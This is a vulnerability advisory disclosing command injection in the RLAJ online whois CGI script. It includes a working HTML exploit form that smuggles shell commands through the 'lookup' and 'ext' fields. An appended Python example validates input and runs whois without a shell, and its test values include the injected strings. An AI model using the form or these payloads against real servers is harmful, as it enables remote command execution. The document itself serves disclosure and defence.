[sp00fed packet] Whois vulnerability

Read the attached advisory.

-- 
WBR, Zeux.
Origin: Truth is not always the same as the majority decision
--- Zeux<zeux@inbox.ru> from sp00fed packet
Mail: zeux@inbox.ru zeux@secforum.net zeux@undergrounda.net
/----------------+--------------------------------------+-------------\
| sp00fed packet |                                      | advisory #1 |
+----------------+--------------------------------------+-------------+
| Product: RLAJ on-line whois service                                 |
| Vulnerability: command execution                                    |
| Danger: high                                                        |
| Vendor: http://www.rlaj.com/                                        |
\---------------------------------------------------------------------/
    ::Description::
 This whois service doesn't filter special symbols, so you can enter
|<any *nix command>| into the domain name field. But the domain name
cannot contain "." symbols. There is one more method. Just use this form:

<form method=post action="http://server/cgi-bin/whois/whois.cgi">
<input type=hidden name="lookup" value=";"> Cmd:
<input type="text" name="ext"><input type=submit value="Go">
</form>
 The script is popular (385 people have downloaded it at www.cgi.ru
(Russian public collection of scripts)), so the danger is high.

    ::Vendor::
 Vendor was informed 2 days ago. No response was received.

    ::Contacts::
 [http://www.sp00fed.ru/] sp00fed packet
 [zeux@inbox.ru] Zeux (it's me ;)
 [spikir@rbcmail.ru] Spikir (team coordinator)
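
The fix for this class of bug, shown as an added example that is not part of the original advisory or of the RLAJ script: validate the two form fields the advisory names (`lookup` and `ext`) against a strict allowlist and run the whois client with an argument vector instead of a shell string. It assumes a Python handler and a `whois` binary on PATH; the function names and length limits are hypothetical.

```python
import re
import subprocess

# Assumption: "lookup" carries a single DNS label and "ext" carries the
# suffix (for example "com" or "co.uk"). Anything else is rejected.
LABEL_RE = re.compile(r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?")
EXT_RE = re.compile(r"[a-z]{2,24}(?:\.[a-z]{2,24})?")


def build_whois_argv(lookup, ext):
    """Return the argv list for the whois client, or raise ValueError.

    Allowlisting means shell metacharacters such as | ; ` $ and whitespace
    never reach the command, whichever field they arrive in.
    """
    name = lookup.strip().lower()
    suffix = ext.strip().lower().lstrip(".")
    if not LABEL_RE.fullmatch(name):
        raise ValueError("invalid domain label")
    if not EXT_RE.fullmatch(suffix):
        raise ValueError("invalid domain extension")
    # The first character is alphanumeric, so the argument cannot be
    # mistaken for a command-line option by the whois client.
    return ["whois", f"{name}.{suffix}"]


def run_whois(lookup, ext, timeout=10):
    """Run whois without a shell; the input is passed as one argv element."""
    argv = build_whois_argv(lookup, ext)
    result = subprocess.run(
        argv,
        shell=False,          # no /bin/sh, so no metacharacter parsing
        capture_output=True,
        text=True,
        timeout=timeout,
        check=False,
    )
    return result.stdout


if __name__ == "__main__":
    # Constructed sample inputs: one valid, three shaped like the advisory's.
    for lookup, ext in [("example", "com"), ("|id|", "com"),
                        (";", "id"), ("example", "com; id")]:
        try:
            print(build_whois_argv(lookup, ext))
        except ValueError as err:
            print(f"rejected {lookup!r}/{ext!r}: {err}")
```

Validation and shell-free execution are independent layers: either one alone blocks the input shapes described above, and keeping both means a later regex mistake does not reopen command execution.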
 
